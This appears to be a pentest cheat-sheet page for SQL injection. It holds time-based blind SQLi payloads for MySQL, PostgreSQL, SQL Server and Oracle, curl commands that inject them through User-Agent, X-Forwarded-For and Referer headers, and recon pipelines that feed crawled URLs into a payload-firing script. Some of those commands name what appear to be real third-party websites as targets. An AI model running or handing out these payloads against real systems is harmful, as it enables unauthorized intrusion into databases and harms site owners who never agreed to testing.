SQL Injection Pentest Toolkit

Recon & Automation Commands 


    

  

  

    
 SQL Injection Payloads

    
-- MySQL
SELECT SLEEP(10);
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
1 AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(FLOOR(RAND()*2),(SELECT SLEEP(5))) AS x FROM information_schema.tables GROUP BY x) y);
' OR IF(1=1, SLEEP(10), 0)-- -

-- PostgreSQL
SELECT pg_sleep(10);
' OR (CASE WHEN ((CLOCK_TIMESTAMP() - NOW()) < interval '0:0:10') THEN (SELECT '1' || pg_sleep(10)) ELSE '0' END)='1
' OR 1=1; SELECT pg_sleep(5);--
' OR (SELECT CASE WHEN (random() < 0.5) THEN pg_sleep(5) ELSE pg_sleep(0) END);--

-- SQL Server
WAITFOR DELAY '00:00:10';
'; WAITFOR DELAY '00:00:05'; --
IF (1=1) WAITFOR DELAY '0:0:10';
'; IF EXISTS (SELECT * FROM users) WAITFOR DELAY '00:00:07';--

-- Oracle
BEGIN DBMS_PIPE.RECEIVE_MESSAGE('a',10); END;
' OR 1=1; BEGIN DBMS_PIPE.RECEIVE_MESSAGE('a',10); END;--
DECLARE v INTEGER; BEGIN IF 1=1 THEN DBMS_PIPE.RECEIVE_MESSAGE('a',10); END IF; END;
    

  

  

    
 Time-Based Testing via Headers

    
User-Agent: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
Referer: '+(select*from(select(if(1=1,sleep(20),false)))a)+'"

time curl -s -H "User-Agent: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z" "https://target.com/vulnerable-endpoint"
time curl -s -H "X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z" "https://target.com/vulnerable-endpoint"
time curl -s -H "Referer: '+(select*from(select(if(1=1,sleep(20),false)))a)+'\"" "https://target.com/vulnerable-endpoint"

time curl "https://target.com/page.php?id=if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/"
    

  

  

    
 Google Dorks 

    
    

      
    

    

    
  

  

    
 Loxs: Universal Time-based SQLi Detector

    

      Loxs detects time-based SQLi across all DBMS types.

       Loxs on GitHub
    

    
python3 loxs.py -u "https://target.com/page.php?id=1"

  

  

    
 SQLi Educational Videos

    

      

        
        
SQLi - Video 1

      

      

        
        
SQLi - Video 2

      

      

        
        
SQLi - Video 3

      

      

        
        
SQLi - Video 4

      

    

  

  

    
 BEST SQLI METHODOLOGY BY COFFIN

    
for single url:
python3 lostsec.py -u "https://cutm.ac.in/payu/skill/index.php?id=34" -p payloads/xor.txt -t 5

for multiple urls:
paramspider -d www.speedway.net.au -o urls.txt
cat output/urls.txt | sed 's/FUZZ//g' >final.txt
python3 lostsec.py -1 final.txt -p payloads/xor.txt -t 5

echo testphp.vulnweb.com | gau --mc 200 | urldedupe >urls.txt
cat urls.txt| grep -E ".php|.asp|.aspx|.cfml|.jsp" | grep '=' | sort > output.txt
cat output.txt | sed 's/=.*/=/' >final.txt
python3 lostsec.py -1 final.txt -p payloads/xor.txt -t 5

echo testphp.vulnweb.com | katana -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -f qurl | urldedupe >output.txt
katana -u http://testphp.vulnweb.com -d 5 | grep '=' | urldedupe | anew output.txt
cat output.txt | sed 's/=.*/=/' >final.txt
python3 lostsec.py -1 final.txt -p payloads/xor.txt -t 5

python3 lostsec.py -u 'https://evil.com/index.php?id=' -p /payloads/xor.txt